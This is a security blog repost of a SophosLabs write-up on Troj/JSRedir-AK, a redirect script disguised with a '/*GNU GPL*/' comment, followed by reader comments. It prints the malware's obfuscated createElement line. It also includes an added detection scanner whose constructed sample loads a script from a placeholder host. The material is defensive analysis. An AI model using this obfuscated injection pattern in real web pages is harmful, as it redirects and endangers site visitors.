GNU GPL malware?: Troj/JSRedir-AK

Yesterday, one of our technology partners, Yandex, notified us of some new malware. They use Sophos to scan the web pages they crawl for malicious content and often report new threats to us.
The malware in question, Troj/JSRedir-AK, is appended to legitimate JavaScript and tries to look legitimate by using a comment to fool web admins.
See the comment:
/*GNU GPL*/
in the picture below.

The code is obfuscated; the line:
document.createElement('s&!c&#^)r^#(!i)@p#&t&)&^'.replace(/\(|\)|&|@|\$|\^|\!|#/ig, ''))
deobfuscates to:
document.createElement('script')
The replace() call simply strips every parenthesis, ampersand, at sign, dollar, caret, exclamation mark and hash from the junk-laden string, leaving only the real characters.
The next few lines of code do the redirection to a webpage in Russia with the following legitimate strings in its URL:

google-com-ar
google.ch
google.com
mininova.org
cams.com
ip138-com
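As an added example (not code from the SophosLabs post), the following scanner looks for the "/*GNU GPL*/" lure together with the character-stripping replace() trick in a constructed script sample, and recovers each hidden string by applying the injected code's own regex to its own literal. The sample script, its hostname and the helper names are assumptions made up for this example.

```javascript
// Added example: detect the "/*GNU GPL*/" marker plus the
// junk-character .replace() trick, and recover the hidden string.
// The script sample below is constructed; it is not the real injection.

// Matches: 'junk-laden literal'.replace(/<alternatives>/<flags>, '')
// Captures the quoted literal, the regex body and the regex flags.
const STRIP_REPLACE_RE =
  /(['"])((?:(?!\1).)+)\1\.replace\(\/((?:\\.|[^\/])+)\/([a-z]*),\s*(['"])\5\)/g;

// Apply the injected code's own regex to its own literal to get clear text.
function deobfuscate(literal, regexBody, flags) {
  // The trick relies on a global replace; add 'g' if the flags lack it.
  const re = new RegExp(regexBody, flags.includes('g') ? flags : flags + 'g');
  return literal.replace(re, '');
}

// Scan a script body. The comment alone is harmless; the combination of
// the lure comment with the strip-replace pattern is what is suspicious.
function scanScript(source) {
  const hasLure = source.includes('/*GNU GPL*/');
  const recovered = [];
  for (const m of source.matchAll(STRIP_REPLACE_RE)) {
    recovered.push(deobfuscate(m[2], m[3], m[4]));
  }
  return { hasLure, recovered, suspicious: hasLure && recovered.length > 0 };
}

// Constructed sample modelled on the obfuscation described in the post.
// The host is a reserved placeholder, not a real redirect target.
const SAMPLE = [
  "/*GNU GPL*/ try { var s = document.createElement(",
  "'s&!c&#^)r^#(!i)@p#&t&)&^'.replace(/\\(|\\)|&|@|\\$|\\^|\\!|#/ig, ''));",
  "s.src = 'h(t)t&p://ex#ample.inv&alid/'.replace(/\\(|\\)|&|#/g, '');",
  "} catch (e) {}",
].join('\n');

console.log(scanScript(SAMPLE));
```

Running the block prints the recovered strings ("script" and the placeholder URL) and flags the sample as suspicious.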

I suspect that this code is part of a larger hack and if you find this code on your website please send us samples of other recently modified files.

Source: SophosLabs blog

2 Comments on “GNU GPL malware?: Troj/JSRedir-AK”

  • Konstantin Boyko wrote on 24 December, 2009, 9:43

    Please check my article about this issue:

    http://justcoded.com/article/gumblar-family-virus-removal-tool/

  • Nick wrote on 6 January, 2010, 20:26

    Yeah…
    My computer somehow picked it up too just recently. In fact I had some virus that managed to get onto my server with GoDaddy and corrupted all of my php files (blogs). I literally had to wipe my computer's hard drive, plus I had to remove all of the blogs off of my server. Then a few days later I start getting reports from people saying that my websites (HTML code) are being quarantined by their spyware protection software on their computers and saying that my site poses a potential threat. Now I'm gonna have to completely wipe out my whole server and start over fresh.

Copyright © 2012 The Security Blog. All rights reserved.